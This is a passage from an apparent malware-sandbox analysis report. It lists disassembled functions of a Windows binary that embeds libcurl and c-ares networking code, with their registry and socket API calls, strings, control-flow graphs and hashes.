                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                  • API String ID: 4281207131-1047472027
                                  • Opcode ID: 11b62d19418eb9e213b0c4185b7684acd156efc09c940be61ee0d1c11cf9f760
                                  • Instruction ID: 03c51c647e58285b47347af336673449b8e981bb16c7e1dd6107c04b0ca4934c
                                  • Opcode Fuzzy Hash: 11b62d19418eb9e213b0c4185b7684acd156efc09c940be61ee0d1c11cf9f760
                                  • Instruction Fuzzy Hash: 9372DEB1604341AFE3209B25CC95B6B77E8AF85704F14482EF985D7391EB78E814CB97
                                  Function 0045A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                  Download Yara Rule
                                  APIs
                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0045A832
                                  Strings
                                  • cf-socket.c, xrefs: 0045A5CD, 0045A735
                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0045A6CE
                                  • @, xrefs: 0045AC42
                                  • Local Interface %s is ip %s using address family %i, xrefs: 0045AE60
                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 0045ADAC
                                  • Bind to local port %d failed, trying next, xrefs: 0045AFE5
                                  • Trying [%s]:%d..., xrefs: 0045A689
                                  • cf_socket_open() -> %d, fd=%d, xrefs: 0045A796
                                  • bind failed with errno %d: %s, xrefs: 0045B080
                                  • @, xrefs: 0045A8F4
                                  • Trying %s:%d..., xrefs: 0045A7C2, 0045A7DE
                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 0045AE1F
                                  • Could not set TCP_NODELAY: %s, xrefs: 0045A871
                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0045AD0A
                                  • Local port: %hu, xrefs: 0045AF28
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                  • API String ID: 3981526788-2373386790
                                  • Opcode ID: 2d256e2aede60c84ad7b4357c1bb764d4cb6e22c46165f4a70eaf52d16caec30
                                  • Instruction ID: 73f2abd49fbb6dbdc6e4ca208c147ffcfe0e8af6552603ab81a181030fe41421
                                  • Opcode Fuzzy Hash: 2d256e2aede60c84ad7b4357c1bb764d4cb6e22c46165f4a70eaf52d16caec30
                                  • Instruction Fuzzy Hash: 28621471504340ABE7208F14C846BABB7E5BF85309F044A2EFD8897292E775E859CB97
                                  Function 004E9740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 937 4e9740-4e975b 938 4e975d-4e9768 call 4e78a0 937->938 939 4e9780-4e9782 937->939 946 4e976e-4e9770 938->946 947 4e99bb-4e99c0 938->947 941 4e9788-4e97a0 call 7a8e00 call 4e78a0 939->941 942 4e9914-4e994e call 7a8b70 RegOpenKeyExA 939->942 941->947 952 4e97a6-4e97c5 941->952 950 4e995a-4e9992 RegQueryValueExA RegCloseKey call 7a8b98 942->950 951 4e9950-4e9955 942->951 946->952 953 4e9772-4e977e 946->953 954 4e9a0c-4e9a15 947->954 965 4e9997-4e99b5 call 4e78a0 950->965 951->954 960 4e9827-4e9833 952->960 961 4e97c7-4e97e0 952->961 953->941 966 4e985f-4e9872 call 4e5ca0 960->966 967 4e9835-4e985c call 4de2b0 * 2 960->967 963 4e97f6-4e9809 961->963 964 4e97e2-4e97f3 call 7a8b50 961->964 963->960 976 4e980b-4e9810 963->976 964->963 965->947 965->952 977 4e9878-4e987d call 4e77b0 966->977 978 4e99f0 966->978 967->966 976->960 982 4e9812-4e9822 976->982 986 4e9882-4e9889 977->986 981 4e99f5-4e99fb call 4e5d00 978->981 991 4e99fe-4e9a09 981->991 982->954 986->981 990 4e988f-4e989b call 4d4fe0 986->990 990->978 996 4e98a1-4e98c3 call 7a8b50 call 4e78a0 990->996 991->954 1001 4e98c9-4e98db call 4de2d0 996->1001 1002 4e99c2-4e99ed call 4de2b0 * 2 996->1002 1001->1002 1006 4e98e1-4e98f0 call 4de2d0 1001->1006 1002->978 1006->1002 1012 4e98f6-4e9905 call 4e63f0 1006->1012 1017 4e990b-4e990f 1012->1017 1018 4e9f66-4e9f7f call 4e5d00 1012->1018 1020 4e9a3f-4e9a5a call 4e6740 call 4e63f0 1017->1020 1018->991 1020->1018 1026 4e9a60-4e9a6e call 4e6d60 1020->1026 1029 4e9a1f-4e9a39 call 4e6840 call 4e63f0 1026->1029 1030 4e9a70-4e9a94 call 4e6200 call 4e67e0 call 4e6320 1026->1030 1029->1018 1029->1020 1041 4e9a16-4e9a19 1030->1041 1042 4e9a96-4e9ac6 call 4dd120 1030->1042 1041->1029 1044 4e9fc1 1041->1044 1047 4e9ac8-4e9adb call 4dd120 1042->1047 1048 4e9ae1-4e9af7 call 4dd190 1042->1048 1046 4e9fc5-4e9ffd call 4e5d00 call 4de2b0 * 2 1044->1046 1046->991 1047->1029 1047->1048 1048->1029 1055 4e9afd-4e9b09 call 4d4fe0 1048->1055 1055->1044 1062 4e9b0f-4e9b29 call 4de730 1055->1062 1067 4e9b2f-4e9b3a call 4e78a0 1062->1067 1068 4e9f84-4e9f88 1062->1068 1067->1068 1074 4e9b40-4e9b54 call 4de760 1067->1074 1069 4e9f95-4e9f99 1068->1069 1071 4e9f9b-4e9f9e 1069->1071 1072 4e9fa0-4e9fb6 call 4debf0 * 2 1069->1072 1071->1044 1071->1072 1084 4e9fb7-4e9fbe 1072->1084 1080 4e9f8a-4e9f92 1074->1080 1081 4e9b5a-4e9b6e call 4de730 1074->1081 1080->1069 1087 4e9b8c-4e9b97 call 4e63f0 1081->1087 1088 4e9b70-4ea004 1081->1088 1084->1044 1096 4e9b9d-4e9bbf call 4e6740 call 4e63f0 1087->1096 1097 4e9c9a-4e9cab call 4dea00 1087->1097 1092 4ea015-4ea01d 1088->1092 1094 4ea01f-4ea022 1092->1094 1095 4ea024-4ea045 call 4debf0 * 2 1092->1095 1094->1046 1094->1095 1095->1046 1096->1097 1114 4e9bc5-4e9bda call 4e6d60 1096->1114 1105 4e9f31-4e9f35 1097->1105 1106 4e9cb1-4e9ccd call 4dea00 call 4de960 1097->1106 1108 4e9f37-4e9f3a 1105->1108 1109 4e9f40-4e9f61 call 4debf0 * 2 1105->1109 1125 4e9ccf 1106->1125 1126 4e9cfd-4e9d0e call 4de960 1106->1126 1108->1029 1108->1109 1109->1029 1114->1097 1124 4e9be0-4e9bf4 call 4e6200 call 4e67e0 1114->1124 1124->1097 1145 4e9bfa-4e9c0b call 4e6320 1124->1145 1129 4e9cd1-4e9cec call 4de9f0 call 4de4a0 1125->1129 1134 4e9d53-4e9d55 1126->1134 1135 4e9d10 1126->1135 1146 4e9cee-4e9cfb call 4de9d0 1129->1146 1147 4e9d47-4e9d51 1129->1147 1139 4e9e69-4e9e8e call 4dea40 call 4de440 1134->1139 1140 4e9d12-4e9d2d call 4de9f0 call 4de4a0 1135->1140 1162 4e9e94-4e9eaa call 4de3c0 1139->1162 1163 4e9e90-4e9e92 1139->1163 1166 4e9d2f-4e9d3c call 4de9d0 1140->1166 1167 4e9d5a-4e9d6f call 4de960 1140->1167 1160 4e9b75-4e9b86 call 4dea00 1145->1160 1161 4e9c11-4e9c1c call 4e7b70 1145->1161 1146->1126 1146->1129 1152 4e9dca-4e9ddb call 4de960 1147->1152 1173 4e9e2e-4e9e36 1152->1173 1174 4e9ddd-4e9ddf 1152->1174 1160->1087 1184 4e9f2d 1160->1184 1161->1087 1178 4e9c22-4e9c33 call 4de960 1161->1178 1193 4ea04a-4ea04c 1162->1193 1194 4e9eb0-4e9eb1 1162->1194 1171 4e9eb3-4e9ec4 call 4de9c0 1163->1171 1166->1140 1186 4e9d3e-4e9d42 1166->1186 1189 4e9dc2 1167->1189 1190 4e9d71-4e9d73 1167->1190 1171->1029 1196 4e9eca-4e9ed0 1171->1196 1180 4e9e3d-4e9e5b call 4debf0 * 2 1173->1180 1181 4e9e38-4e9e3b 1173->1181 1183 4e9e06-4e9e21 call 4de9f0 call 4de4a0 1174->1183 1204 4e9c66-4e9c75 call 4e78a0 1178->1204 1205 4e9c35 1178->1205 1191 4e9e5e-4e9e67 1180->1191 1181->1180 1181->1191 1220 4e9e23-4e9e2c call 4deac0 1183->1220 1221 4e9de1-4e9dee call 4dec80 1183->1221 1184->1105 1186->1139 1189->1152 1201 4e9d9a-4e9db5 call 4de9f0 call 4de4a0 1190->1201 1191->1139 1191->1171 1199 4ea04e-4ea051 1193->1199 1200 4ea057-4ea070 call 4debf0 * 2 1193->1200 1194->1171 1203 4e9ee5-4e9ef2 call 4de9f0 1196->1203 1199->1044 1199->1200 1200->1084 1234 4e9db7-4e9dc0 call 4deac0 1201->1234 1235 4e9d75-4e9d82 call 4dec80 1201->1235 1203->1029 1228 4e9ef8-4e9f0e call 4de440 1203->1228 1224 4e9c7b-4e9c8f call 4de7c0 1204->1224 1225 4ea011 1204->1225 1212 4e9c37-4e9c51 call 4de9f0 1205->1212 1212->1087 1250 4e9c57-4e9c64 call 4de9d0 1212->1250 1244 4e9df1-4e9e04 call 4de960 1220->1244 1221->1244 1224->1087 1245 4e9c95-4ea00e 1224->1245 1225->1092 1248 4e9ed2-4e9edf call 4de9e0 1228->1248 1249 4e9f10-4e9f26 call 4de3c0 1228->1249 1255 4e9d85-4e9d98 call 4de960 1234->1255 1235->1255 1244->1173 1244->1183 1245->1225 1248->1029 1248->1203 1249->1248 1264 4e9f28 1249->1264 1250->1204 1250->1212 1255->1189 1255->1201 1264->1044
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004E9946
                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 004E9974
                                  • RegCloseKey.KERNELBASE(?), ref: 004E998B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                  • API String ID: 3677997916-615551945
                                  • Opcode ID: 234b017d12c4959c87efe3de8e4a0207130dc5bc77404eff52c2aff2b2fd046e
                                  • Instruction ID: e62852bb0f05e3da326ee33acef307857a7749df418973aa7a87d7a9c5ddd7cb
                                  • Opcode Fuzzy Hash: 234b017d12c4959c87efe3de8e4a0207130dc5bc77404eff52c2aff2b2fd046e
                                  • Instruction Fuzzy Hash: 4632C6F1900241ABEB10AB27AC42A1B7694AF54319F08443BFD499B3A3F739ED14C75B
                                  Function 00458B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1358 458b50-458b69 1359 458be6 1358->1359 1360 458b6b-458b74 1358->1360 1361 458be9 1359->1361 1362 458b76-458b8d 1360->1362 1363 458beb-458bf2 1360->1363 1361->1363 1364 458bf3-458bfe call 45a550 1362->1364 1365 458b8f-458ba7 call 436e40 1362->1365 1370 458de4-458def 1364->1370 1371 458c04-458c08 1364->1371 1372 458bad-458baf 1365->1372 1373 458cd9-458d16 SleepEx 1365->1373 1376 458df5-458e19 call 45a150 1370->1376 1377 458e8c-458e95 1370->1377 1374 458dbd-458dc3 1371->1374 1375 458c0e-458c1d 1371->1375 1378 458bb5-458bb9 1372->1378 1379 458ca6-458cb0 1372->1379 1389 458d22 1373->1389 1390 458d18-458d20 1373->1390 1374->1361 1383 458c35-458c48 call 45a150 1375->1383 1384 458c1f-458c30 connect 1375->1384 1413 458e88 1376->1413 1414 458e1b-458e26 1376->1414 1381 458e97-458e9c 1377->1381 1382 458f00-458f06 1377->1382 1378->1363 1387 458bbb-458bc2 1378->1387 1379->1373 1385 458cb2-458cb8 1379->1385 1391 458edf-458eef call 4278b0 1381->1391 1392 458e9e-458eb6 call 432a00 1381->1392 1382->1363 1412 458c4d-458c4f 1383->1412 1384->1383 1393 458ddc-458dde 1385->1393 1394 458cbe-458cd4 call 45b180 1385->1394 1387->1363 1388 458bc4-458bcc 1387->1388 1396 458bd4-458bda 1388->1396 1397 458bce-458bd2 1388->1397 1399 458d26-458d39 1389->1399 1390->1399 1416 458ef2-458efc 1391->1416 1392->1391 1418 458eb8-458edd call 433410 * 2 1392->1418 1393->1361 1393->1370 1394->1370 1396->1363 1406 458bdc-458be1 1396->1406 1397->1363 1397->1396 1409 458d43-458d61 call 43d8c0 call 45a150 1399->1409 1410 458d3b-458d3d 1399->1410 1415 458dac-458db8 call 4650a0 1406->1415 1437 458d66-458d74 1409->1437 1410->1393 1410->1409 1420 458c51-458c58 1412->1420 1421 458c8e-458c93 1412->1421 1413->1377 1422 458e2e-458e85 call 43d090 call 464fd0 1414->1422 1423 458e28-458e2c 1414->1423 1415->1363 1416->1382 1418->1416 1420->1421 1427 458c5a-458c62 1420->1427 1430 458c99-458c9f 1421->1430 1431 458dc8-458dd9 call 45b100 1421->1431 1422->1413 1423->1413 1423->1422 1433 458c64-458c68 1427->1433 1434 458c6a-458c70 1427->1434 1430->1379 1431->1393 1433->1421 1433->1434 1434->1421 1439 458c72-458c8b call 4650a0 1434->1439 1437->1363 1442 458d7a-458d81 1437->1442 1439->1421 1442->1363 1443 458d87-458d8f 1442->1443 1447 458d91-458d95 1443->1447 1448 458d9b-458da1 1443->1448 1447->1363 1447->1448 1448->1363 1451 458da7 1448->1451 1451->1415
                                  APIs
                                  • connect.WS2_32(?,?,00000001), ref: 00458C30
                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00458CF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: Sleepconnect
                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                  • API String ID: 238548546-879669977
                                  • Opcode ID: 07f4bb761a5dce50c473e04fd8097eb858dcce3d988df221f5f19350474681cd
                                  • Instruction ID: e635a5d7275e44dd19523f597202083f19d8197573ad6a6238960459b4d962c7
                                  • Opcode Fuzzy Hash: 07f4bb761a5dce50c473e04fd8097eb858dcce3d988df221f5f19350474681cd
                                  • Instruction Fuzzy Hash: 63B1AD70604705ABEB10CE24C885BA777A4AF45319F04852EEC59AB393DF78E85CCB66
                                  Function 00422F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1452 422f17-422f8c call 8d6430 call 8d6820 1457 4231c9-4231cd 1452->1457 1458 4231d3-4231d6 1457->1458 1459 422f91-422ff4 call 421619 RegOpenKeyExA 1457->1459 1462 4231c5 1459->1462 1463 422ffa-42300b 1459->1463 1462->1457 1464 42315c-4231ac RegEnumKeyExA 1463->1464 1465 4231b2-4231c2 1464->1465 1466 423010-423083 call 421619 RegOpenKeyExA 1464->1466 1465->1462 1470 423089-4230d4 RegQueryValueExA 1466->1470 1471 42314e-423152 1466->1471 1472 4230d6-423137 call 8d6700 call 8d6790 call 8d6820 call 8d6630 call 8d6820 call 8d4b90 1470->1472 1473 42313b-42314b RegCloseKey 1470->1473 1471->1464 1472->1473 1473->1471
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: EnumOpen
                                  • String ID: d
                                  • API String ID: 3231578192-2564639436
                                  • Opcode ID: 13ac59130680819926aa4cd29b5d2b3de8fe9fb0fd68c683a7d80e09571d565c
                                  • Instruction ID: af7fd95a67e6391596d51f2fc8710db3f342920ff3a24d93f2df9b1220bd504a
                                  • Opcode Fuzzy Hash: 13ac59130680819926aa4cd29b5d2b3de8fe9fb0fd68c683a7d80e09571d565c
                                  • Instruction Fuzzy Hash: 2371B3B49043199FDB10DF69D58479EBBF0FF84308F10896DE99897311E7749A888F92
                                  Function 004276A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1486 4276a0-4276be 1487 4276c0-4276c7 1486->1487 1488 4276e6-4276f2 send 1486->1488 1487->1488 1491 4276c9-4276d1 1487->1491 1489 4276f4-427709 call 4272a0 1488->1489 1490 42775e-427762 1488->1490 1489->1490 1493 4276d3-4276e4 1491->1493 1494 42770b-427759 call 4272a0 call 42cb20 call 7a8c50 1491->1494 1493->1489 1494->1490
                                  APIs
                                  • send.WS2_32(multi.c,?,?,?,N=B,00000000,?,?,004307BF), ref: 004276EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: LIMIT %s:%d %s reached memlimit$N=B$SEND %s:%d send(%lu) = %ld$multi.c$send
                                  • API String ID: 2809346765-2025329211
                                  • Opcode ID: 07de89ca14bf37dd5674ef1ed90f064c1ec086e0db6bd1910ffbd873dc2fb00b
                                  • Instruction ID: 2856db95599e25d87f3ae0fe2aa4b920d431f1220a9b1f59084952a9a3294f90
                                  • Opcode Fuzzy Hash: 07de89ca14bf37dd5674ef1ed90f064c1ec086e0db6bd1910ffbd873dc2fb00b
                                  • Instruction Fuzzy Hash: BB1104B1B1C3247BD110A759BD8AE2B7B5CDBC6B6CF840919B80453342E6669C008AB7
                                  Function 00459290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
